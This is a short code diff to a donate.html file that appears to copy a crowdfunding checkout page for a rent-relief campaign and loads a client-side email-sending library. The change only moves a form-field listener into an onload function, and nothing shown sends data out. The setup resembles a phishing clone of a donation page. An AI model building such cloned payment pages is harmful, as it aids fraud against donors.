--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -6,6 +6,7 @@
   <script src="https://smtpjs.com/v3/smtp.js"></script> 
 	 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
 	<script>
+		function change(){
 		document.querySelector("#checkout-donation").addEventListener('input', function (evt) {
     			try{
 				document.querySelector("#root > div > main > div > div > div.l-checkout-single-page.disp-flex.align-center > div > form > div.mb-three-halves.o-checkout-donation > div.m-form-field.m-form-field--stacked.o-checkout-donation-amount.m-currency-field.m-currency-field--error").className = 'm-form-field m-form-field--stacked o-checkout-donation-amount m-currency-field m-currency-field';
@@ -15,7 +16,7 @@
 			}
 		});
 		
-					
+		}		
 	 </script>
 	 <script>
 	 /*
@@ -239,7 +240,7 @@
 .fb_iframe_widget{display:inline-block;position:relative}.fb_iframe_widget span{display:inline-block;position:relative;text-align:justify}.fb_iframe_widget iframe{position:absolute}.fb_iframe_widget_fluid_desktop,.fb_iframe_widget_fluid_desktop span,.fb_iframe_widget_fluid_desktop iframe{max-width:100%}.fb_iframe_widget_fluid_desktop iframe{min-width:220px;position:relative}.fb_iframe_widget_lift{z-index:1}.fb_iframe_widget_fluid{display:inline}.fb_iframe_widget_fluid span{width:100%}
   </style>
  </head>
- <body class="">
+ <body class="" onload="change()">
   <noscript>
    You need to enable JavaScript to run this app.
   </noscript>
